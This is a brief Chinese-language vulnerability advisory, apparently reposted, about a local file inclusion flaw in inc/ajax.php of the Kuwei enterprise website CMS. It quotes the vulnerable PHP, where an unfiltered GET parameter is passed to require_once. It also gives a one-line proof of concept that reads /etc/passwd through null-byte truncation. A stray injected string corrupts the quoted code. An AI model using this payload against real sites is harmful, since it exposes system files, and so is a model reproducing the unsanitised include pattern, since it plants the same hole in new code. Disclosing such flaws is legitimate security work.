漏洞文件:inc/ajax.php
漏洞代码: <?php header('Content-Type:text/html; charset=utf-8'); $absolutepath = $_GET['absolutepath']; require_once($absolutepath.'inc/common.inc.php'); $sql = "update {$configTableHead}{$dbtable} set clicknum={$clicknum}+1 where id={$id}"; HdhCmsTest2cto测试数据 $result = $dbInstance->query($sql); ?>
$absolutepath参数直接获取GET传递的值没有任何过滤加入require_once! 这个包含的而且还是 数据库 配置文件! POC: ajax.php?absolutepath=etc/passwd%00.
修复:包含问题修复见本站以前文章
查看更多关于酷纬企业网站管理系统本地包含漏洞及修复 - 网的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did11304